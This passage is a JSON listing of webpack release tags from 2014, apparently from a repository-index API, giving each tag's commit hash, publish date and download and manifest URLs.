10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commi